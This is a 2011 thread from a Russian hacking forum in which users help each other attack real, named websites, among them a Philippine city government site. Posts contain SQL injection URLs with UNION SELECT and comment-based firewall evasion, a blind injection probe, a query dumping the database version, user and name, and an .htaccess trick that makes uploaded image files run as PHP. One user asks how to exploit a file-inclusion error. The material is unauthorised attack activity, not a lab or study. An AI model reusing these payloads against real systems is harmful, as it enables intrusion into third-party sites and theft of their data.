HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18771  
Старый 04.12.2011, 19:31
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Попробуй залить .htaccess с содержанием:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]AddHandler application[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]httpd[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]gif

[/COLOR][/COLOR
 
Ответить с цитированием

  #18772  
Старый 04.12.2011, 19:42
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами: 8718197

Репутация: 11
По умолчанию

Цитата:
Сообщение от Ereee  
Попробуй залить .htaccess с содержанием:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]AddHandler application[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]httpd[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]gif

[/COLOR][/COLOR
Залил AddHandler application/x-httpd-php .php .html _php .png

smile.html(белая страница) i smile.png(изображение содержит ошибки..) не работают

При

AddType application/x-httpd-php .gif



Качает файл
 
Ответить с цитированием

  #18773  
Старый 04.12.2011, 21:08
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

wkar, бывает, что на некоторых серверах этот способ не могает...
 
Ответить с цитированием

  #18774  
Старый 04.12.2011, 22:27
shadowrun
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами: 8265206

Репутация: 84


По умолчанию

Код:
http://onlinewatch24.com/watch/Harry-Potter-and-the-Half-Blood-Prince%27+un/**/ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
union не нравится ему
 
Ответить с цитированием

  #18775  
Старый 04.12.2011, 23:37
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от shadowrun  
Код:
http://onlinewatch24.com/watch/Harry-Potter-and-the-Half-Blood-Prince%27+un/**/ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
union не нравится ему
Крути блиндом, по-другому не выйдет

_http://onlinewatch24.com/search?search=&p=1&f=title+and%20mid(version(),1,1 )=5+--+
 
Ответить с цитированием

  #18776  
Старый 05.12.2011, 00:31
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами: 8784803

Репутация: 257
По умолчанию

Цитата:
Сообщение от lightangel  
I have a problem here.
Код:
http://www.pasigcity.gov.ph/subpages/news.aspx?nSeq=183+and+1=0+/!*union*/+/*!select*/+0,1,2,3,4,5,6,7,8
Код:
WebKnight Application Firewall Alert

Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.

What is WebKnight?
AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.

For more information on WebKnight: http://www.aqtronix.com/WebKnight/

AQTRONIX WebKnight
How do I execute?
Your request is blocking firewall on the server

In the case of a specific vulnerability in firewall, you can spend an injection. More about this http://www.ptsecurity.ru/download/PT-devteev-CC-WAF.pdf
 
Ответить с цитированием

  #18777  
Старый 05.12.2011, 02:59
lightangel
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами: 7638806

Репутация: -6
По умолчанию

I need a solution to my problem here.

Код:
http://accesssys.net/product_details.php?pid=109%27+and+1=0+union+select+1,2,3,4+--+
It's showing this.

The used SELECT statements have a different number of columns

Any help please?
 
Ответить с цитированием

  #18778  
Старый 05.12.2011, 03:08
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
С нами: 9318329

Репутация: 394
По умолчанию

lightangel

http://accesssys.net/solutions.php?sid=-100+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ve rsion(),user(),database()),10--
 
Ответить с цитированием

  #18779  
Старый 05.12.2011, 03:10
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

2lightangel /thread43966.html ты уже ***
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #18780  
Старый 05.12.2011, 20:52
stan0009
Участник форума
Регистрация: 30.07.2010
Сообщений: 118
С нами: 8308406

Репутация: 0
По умолчанию

Товарищи! Нужна ваша помощь!

короче вчера вечером тупо лазил по инету и на одной страничке нашел примерно такое:

Цитата:
Сообщение от None  
Warning: include(fuck.php) [function.include]: failed to open stream: No such file or directory in fuck/fuck/fuck.php
подскажите вид уязвимости^^

а далее сам чего нибудь накручу

если не получится то конешно отдам вам на растерзание))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.